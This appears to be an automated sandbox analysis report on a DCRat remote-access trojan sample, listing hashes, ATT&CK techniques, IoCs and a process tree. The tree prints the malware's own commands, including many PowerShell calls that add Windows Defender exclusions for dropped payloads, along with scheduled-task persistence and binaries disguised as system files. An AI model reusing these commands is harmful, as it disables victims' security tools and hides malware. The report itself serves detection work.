dcrat | a2a710c67a15147808abb3cae67ad5178d2f36f23207931f4c9ed9c70828bb62

Analysis

max time kernel
149s
max time network
150s
platform
windows7_x64
resource
win7-20241023-en
resource tags

arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
submitted
22/12/2024, 08:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

JaffaCakes118_a2a710c67a15147808abb3cae67ad5178d2f36f23207931f4c9ed9c70828bb62.exe
Size

1.3MB
MD5

c0928c06799b6c2bd9e9b5081d929aa4
SHA1

fd3e0f137f34860252178b8239e3a3a72c18e0cc
SHA256

a2a710c67a15147808abb3cae67ad5178d2f36f23207931f4c9ed9c70828bb62
SHA512

58fa59cabb9067fe6b99742d5543895f53b82f9076607313cdb26e1f578399471a01fd3b0921d7048af6af3dbd3bf8e45f548dd0e9a06ac7352e23029b2f1c03
SSDEEP

24576:U2G/nvxW3Ww0t6TnzGmVBDh4+aknuRRZJND0gFJ4rD/IjC:UbA30GnzV/q+DnsXg

Score

10^/10

dcrat discovery execution infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Process spawned unexpected child process 64 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3036	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2848	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2988	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2736	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2692	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2732	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1916	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2320	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2136	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2208	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	796	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1364	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2656	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2296	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2032	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1288	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	112	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1540	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	992	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1544	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2488	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2516	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2672	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1112	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1492	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	888	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	776	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1764	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1732	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2520	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2172	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2772	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2116	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1660	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2332	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1912	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1752	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2700	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1648	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2712	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	644	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1528	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2148	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2980	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3000	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1740	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2908	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1220	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2260	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2368	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1436	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1340	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1292	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1940	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	556	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2244	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	820	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	340	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1788	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1720	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1500	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2204	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1268	2960	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1928	2960	schtasks.exe	35

DCRat payload 13 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/files/0x0008000000016b47-9.dat	dcrat
behavioral1/memory/1776-13-0x0000000000AF0000-0x0000000000C00000-memory.dmp	dcrat
behavioral1/memory/1048-51-0x0000000001390000-0x00000000014A0000-memory.dmp	dcrat
behavioral1/memory/2708-199-0x00000000008B0000-0x00000000009C0000-memory.dmp	dcrat
behavioral1/memory/2272-259-0x0000000000C30000-0x0000000000D40000-memory.dmp	dcrat
behavioral1/memory/704-320-0x00000000010D0000-0x00000000011E0000-memory.dmp	dcrat
behavioral1/memory/3016-380-0x00000000011A0000-0x00000000012B0000-memory.dmp	dcrat
behavioral1/memory/2432-440-0x0000000000360000-0x0000000000470000-memory.dmp	dcrat
behavioral1/memory/1864-500-0x00000000010F0000-0x0000000001200000-memory.dmp	dcrat
behavioral1/memory/2404-560-0x0000000000050000-0x0000000000160000-memory.dmp	dcrat
behavioral1/memory/1744-620-0x0000000001350000-0x0000000001460000-memory.dmp	dcrat
behavioral1/memory/1248-680-0x00000000002B0000-0x00000000003C0000-memory.dmp	dcrat
behavioral1/memory/1644-740-0x00000000001E0000-0x00000000002F0000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 24 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2028	powershell.exe
1680	powershell.exe
796	powershell.exe
2524	powershell.exe
2576	powershell.exe
1944	powershell.exe
2344	powershell.exe
1028	powershell.exe
1860	powershell.exe
1696	powershell.exe
572	powershell.exe
2464	powershell.exe
2608	powershell.exe
536	powershell.exe
2216	powershell.exe
1864	powershell.exe
704	powershell.exe
1240	powershell.exe
972	powershell.exe
1484	powershell.exe
2296	powershell.exe
1004	powershell.exe
1104	powershell.exe
1380	powershell.exe

Executes dropped EXE 12 IoCs

pid	Process
1776	DllCommonsvc.exe
1048	DllCommonsvc.exe
2708	dwm.exe
2272	dwm.exe
704	dwm.exe
3016	dwm.exe
2432	dwm.exe
1864	dwm.exe
2404	dwm.exe
1744	dwm.exe
1248	dwm.exe
1644	dwm.exe

Loads dropped DLL 2 IoCs

pid	Process
2368	cmd.exe
2368	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 11 IoCs

Web Service

T1102

flow	ioc
4	raw.githubusercontent.com
5	raw.githubusercontent.com
18	raw.githubusercontent.com
29	raw.githubusercontent.com
37	raw.githubusercontent.com
9	raw.githubusercontent.com
12	raw.githubusercontent.com
15	raw.githubusercontent.com
22	raw.githubusercontent.com
26	raw.githubusercontent.com
33	raw.githubusercontent.com

Drops file in Program Files directory 11 IoCs

description	ioc	Process
File created	C:\Program Files\Common Files\Microsoft Shared\WmiPrvSE.exe	DllCommonsvc.exe
File created	C:\Program Files\Windows Portable Devices\services.exe	DllCommonsvc.exe
File created	C:\Program Files\Windows Portable Devices\c5b4cb5e9653cc	DllCommonsvc.exe
File created	C:\Program Files\Windows NT\6ccacd8608530f	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows Media Player\de-DE\27d1bcfc3c54e0	DllCommonsvc.exe
File created	C:\Program Files\Windows Sidebar\fr-FR\taskhost.exe	DllCommonsvc.exe
File created	C:\Program Files\Windows Sidebar\fr-FR\b75386f1303e64	DllCommonsvc.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\WmiPrvSE.exe	DllCommonsvc.exe
File created	C:\Program Files\Common Files\Microsoft Shared\24dbde2999530e	DllCommonsvc.exe
File created	C:\Program Files\Windows NT\Idle.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows Media Player\de-DE\System.exe	DllCommonsvc.exe

Drops file in Windows directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\conhost.exe	DllCommonsvc.exe
File created	C:\Windows\RemotePackages\RemoteApps\56085415360792	DllCommonsvc.exe
File created	C:\Windows\Setup\sppsvc.exe	DllCommonsvc.exe
File created	C:\Windows\Cursors\886983d96e3d3e	DllCommonsvc.exe
File created	C:\Windows\Microsoft.NET\authman\spoolsv.exe	DllCommonsvc.exe
File created	C:\Windows\Microsoft.NET\authman\f3b6ecef712a24	DllCommonsvc.exe
File created	C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\conhost.exe	DllCommonsvc.exe
File created	C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\088424020bedd6	DllCommonsvc.exe
File created	C:\Windows\RemotePackages\RemoteApps\wininit.exe	DllCommonsvc.exe
File created	C:\Windows\Speech\Common\fr-FR\smss.exe	DllCommonsvc.exe
File created	C:\Windows\Setup\0a1fd5f707cd16	DllCommonsvc.exe
File created	C:\Windows\Cursors\csrss.exe	DllCommonsvc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JaffaCakes118_a2a710c67a15147808abb3cae67ad5178d2f36f23207931f4c9ed9c70828bb62.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2488	schtasks.exe
1912	schtasks.exe
2136	schtasks.exe
1364	schtasks.exe
1288	schtasks.exe
1540	schtasks.exe
2732	schtasks.exe
776	schtasks.exe
1660	schtasks.exe
2332	schtasks.exe
1808	schtasks.exe
2204	schtasks.exe
2656	schtasks.exe
992	schtasks.exe
888	schtasks.exe
2908	schtasks.exe
1940	schtasks.exe
1500	schtasks.exe
1916	schtasks.exe
2320	schtasks.exe
1764	schtasks.exe
2520	schtasks.exe
3000	schtasks.exe
1292	schtasks.exe
2244	schtasks.exe
2848	schtasks.exe
2980	schtasks.exe
820	schtasks.exe
2700	schtasks.exe
1648	schtasks.exe
644	schtasks.exe
2148	schtasks.exe
2988	schtasks.exe
2692	schtasks.exe
1544	schtasks.exe
2516	schtasks.exe
1220	schtasks.exe
556	schtasks.exe
1788	schtasks.exe
1492	schtasks.exe
2172	schtasks.exe
1340	schtasks.exe
340	schtasks.exe
796	schtasks.exe
2296	schtasks.exe
112	schtasks.exe
2672	schtasks.exe
968	schtasks.exe
2208	schtasks.exe
2032	schtasks.exe
2116	schtasks.exe
1268	schtasks.exe
1732	schtasks.exe
1528	schtasks.exe
1720	schtasks.exe
3036	schtasks.exe
2736	schtasks.exe
1112	schtasks.exe
2772	schtasks.exe
1752	schtasks.exe
1740	schtasks.exe
1436	schtasks.exe
2712	schtasks.exe
2260	schtasks.exe

Suspicious behavior: EnumeratesProcesses 40 IoCs

pid	Process
1776	DllCommonsvc.exe
1944	powershell.exe
2576	powershell.exe
2028	powershell.exe
2344	powershell.exe
1048	DllCommonsvc.exe
1048	DllCommonsvc.exe
1048	DllCommonsvc.exe
1048	DllCommonsvc.exe
1048	DllCommonsvc.exe
704	powershell.exe
1028	powershell.exe
1484	powershell.exe
796	powershell.exe
1680	powershell.exe
2608	powershell.exe
572	powershell.exe
1240	powershell.exe
2216	powershell.exe
1104	powershell.exe
1864	powershell.exe
1004	powershell.exe
1696	powershell.exe
2296	powershell.exe
1860	powershell.exe
2464	powershell.exe
536	powershell.exe
972	powershell.exe
2524	powershell.exe
1380	powershell.exe
2708	dwm.exe
2272	dwm.exe
704	dwm.exe
3016	dwm.exe
2432	dwm.exe
1864	dwm.exe
2404	dwm.exe
1744	dwm.exe
1248	dwm.exe
1644	dwm.exe

Suspicious use of AdjustPrivilegeToken 36 IoCs

description	pid	Process
Token: SeDebugPrivilege	1776	DllCommonsvc.exe
Token: SeDebugPrivilege	1944	powershell.exe
Token: SeDebugPrivilege	2576	powershell.exe
Token: SeDebugPrivilege	2028	powershell.exe
Token: SeDebugPrivilege	2344	powershell.exe
Token: SeDebugPrivilege	1048	DllCommonsvc.exe
Token: SeDebugPrivilege	704	powershell.exe
Token: SeDebugPrivilege	1028	powershell.exe
Token: SeDebugPrivilege	1484	powershell.exe
Token: SeDebugPrivilege	796	powershell.exe
Token: SeDebugPrivilege	1680	powershell.exe
Token: SeDebugPrivilege	2608	powershell.exe
Token: SeDebugPrivilege	572	powershell.exe
Token: SeDebugPrivilege	1240	powershell.exe
Token: SeDebugPrivilege	2216	powershell.exe
Token: SeDebugPrivilege	1104	powershell.exe
Token: SeDebugPrivilege	1864	powershell.exe
Token: SeDebugPrivilege	1004	powershell.exe
Token: SeDebugPrivilege	1696	powershell.exe
Token: SeDebugPrivilege	2296	powershell.exe
Token: SeDebugPrivilege	1860	powershell.exe
Token: SeDebugPrivilege	2464	powershell.exe
Token: SeDebugPrivilege	536	powershell.exe
Token: SeDebugPrivilege	972	powershell.exe
Token: SeDebugPrivilege	2524	powershell.exe
Token: SeDebugPrivilege	1380	powershell.exe
Token: SeDebugPrivilege	2708	dwm.exe
Token: SeDebugPrivilege	2272	dwm.exe
Token: SeDebugPrivilege	704	dwm.exe
Token: SeDebugPrivilege	3016	dwm.exe
Token: SeDebugPrivilege	2432	dwm.exe
Token: SeDebugPrivilege	1864	dwm.exe
Token: SeDebugPrivilege	2404	dwm.exe
Token: SeDebugPrivilege	1744	dwm.exe
Token: SeDebugPrivilege	1248	dwm.exe
Token: SeDebugPrivilege	1644	dwm.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2312 wrote to memory of 1660	2312	JaffaCakes118_a2a710c67a15147808abb3cae67ad5178d2f36f23207931f4c9ed9c70828bb62.exe	30
PID 2312 wrote to memory of 1660	2312	JaffaCakes118_a2a710c67a15147808abb3cae67ad5178d2f36f23207931f4c9ed9c70828bb62.exe	30
PID 2312 wrote to memory of 1660	2312	JaffaCakes118_a2a710c67a15147808abb3cae67ad5178d2f36f23207931f4c9ed9c70828bb62.exe	30
PID 2312 wrote to memory of 1660	2312	JaffaCakes118_a2a710c67a15147808abb3cae67ad5178d2f36f23207931f4c9ed9c70828bb62.exe	30
PID 1660 wrote to memory of 2368	1660	WScript.exe	31
PID 1660 wrote to memory of 2368	1660	WScript.exe	31
PID 1660 wrote to memory of 2368	1660	WScript.exe	31
PID 1660 wrote to memory of 2368	1660	WScript.exe	31
PID 2368 wrote to memory of 1776	2368	cmd.exe	33
PID 2368 wrote to memory of 1776	2368	cmd.exe	33
PID 2368 wrote to memory of 1776	2368	cmd.exe	33
PID 2368 wrote to memory of 1776	2368	cmd.exe	33
PID 1776 wrote to memory of 2576	1776	DllCommonsvc.exe	45
PID 1776 wrote to memory of 2576	1776	DllCommonsvc.exe	45
PID 1776 wrote to memory of 2576	1776	DllCommonsvc.exe	45
PID 1776 wrote to memory of 1944	1776	DllCommonsvc.exe	46
PID 1776 wrote to memory of 1944	1776	DllCommonsvc.exe	46
PID 1776 wrote to memory of 1944	1776	DllCommonsvc.exe	46
PID 1776 wrote to memory of 2344	1776	DllCommonsvc.exe	49
PID 1776 wrote to memory of 2344	1776	DllCommonsvc.exe	49
PID 1776 wrote to memory of 2344	1776	DllCommonsvc.exe	49
PID 1776 wrote to memory of 2028	1776	DllCommonsvc.exe	50
PID 1776 wrote to memory of 2028	1776	DllCommonsvc.exe	50
PID 1776 wrote to memory of 2028	1776	DllCommonsvc.exe	50
PID 1776 wrote to memory of 1876	1776	DllCommonsvc.exe	53
PID 1776 wrote to memory of 1876	1776	DllCommonsvc.exe	53
PID 1776 wrote to memory of 1876	1776	DllCommonsvc.exe	53
PID 1876 wrote to memory of 2288	1876	cmd.exe	55
PID 1876 wrote to memory of 2288	1876	cmd.exe	55
PID 1876 wrote to memory of 2288	1876	cmd.exe	55
PID 1876 wrote to memory of 1048	1876	cmd.exe	56
PID 1876 wrote to memory of 1048	1876	cmd.exe	56
PID 1876 wrote to memory of 1048	1876	cmd.exe	56
PID 1048 wrote to memory of 1864	1048	DllCommonsvc.exe	114
PID 1048 wrote to memory of 1864	1048	DllCommonsvc.exe	114
PID 1048 wrote to memory of 1864	1048	DllCommonsvc.exe	114
PID 1048 wrote to memory of 1028	1048	DllCommonsvc.exe	115
PID 1048 wrote to memory of 1028	1048	DllCommonsvc.exe	115
PID 1048 wrote to memory of 1028	1048	DllCommonsvc.exe	115
PID 1048 wrote to memory of 704	1048	DllCommonsvc.exe	116
PID 1048 wrote to memory of 704	1048	DllCommonsvc.exe	116
PID 1048 wrote to memory of 704	1048	DllCommonsvc.exe	116
PID 1048 wrote to memory of 1860	1048	DllCommonsvc.exe	117
PID 1048 wrote to memory of 1860	1048	DllCommonsvc.exe	117
PID 1048 wrote to memory of 1860	1048	DllCommonsvc.exe	117
PID 1048 wrote to memory of 1240	1048	DllCommonsvc.exe	118
PID 1048 wrote to memory of 1240	1048	DllCommonsvc.exe	118
PID 1048 wrote to memory of 1240	1048	DllCommonsvc.exe	118
PID 1048 wrote to memory of 1004	1048	DllCommonsvc.exe	119
PID 1048 wrote to memory of 1004	1048	DllCommonsvc.exe	119
PID 1048 wrote to memory of 1004	1048	DllCommonsvc.exe	119
PID 1048 wrote to memory of 1104	1048	DllCommonsvc.exe	120
PID 1048 wrote to memory of 1104	1048	DllCommonsvc.exe	120
PID 1048 wrote to memory of 1104	1048	DllCommonsvc.exe	120
PID 1048 wrote to memory of 796	1048	DllCommonsvc.exe	121
PID 1048 wrote to memory of 796	1048	DllCommonsvc.exe	121
PID 1048 wrote to memory of 796	1048	DllCommonsvc.exe	121
PID 1048 wrote to memory of 972	1048	DllCommonsvc.exe	122
PID 1048 wrote to memory of 972	1048	DllCommonsvc.exe	122
PID 1048 wrote to memory of 972	1048	DllCommonsvc.exe	122
PID 1048 wrote to memory of 1696	1048	DllCommonsvc.exe	123
PID 1048 wrote to memory of 1696	1048	DllCommonsvc.exe	123
PID 1048 wrote to memory of 1696	1048	DllCommonsvc.exe	123
PID 1048 wrote to memory of 1680	1048	DllCommonsvc.exe	125

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_a2a710c67a15147808abb3cae67ad5178d2f36f23207931f4c9ed9c70828bb62.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_a2a710c67a15147808abb3cae67ad5178d2f36f23207931f4c9ed9c70828bb62.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2312
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1660
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\providercommon\1zu9dW.bat" "
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2368
  - - C:\providercommon\DllCommonsvc.exe
      "C:\providercommon\DllCommonsvc.exe"
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1776
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2576
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\conhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1944
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\smss.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2344
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\RemotePackages\RemoteApps\wininit.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2028
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\d4IjOEVlLZ.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1876
      - C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        6⤵
        
        PID:2288
      - C:\providercommon\DllCommonsvc.exe
        
        "C:\providercommon\DllCommonsvc.exe"
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1048
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1864
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\Microsoft Shared\WmiPrvSE.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1028
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\WmiPrvSE.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:704
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OSPPSVC.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1860
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\csrss.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1240
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\services.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\System.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1104
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\Idle.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:796
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Media Player\de-DE\System.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:972
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\lsm.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1696
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\winlogon.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1680
        
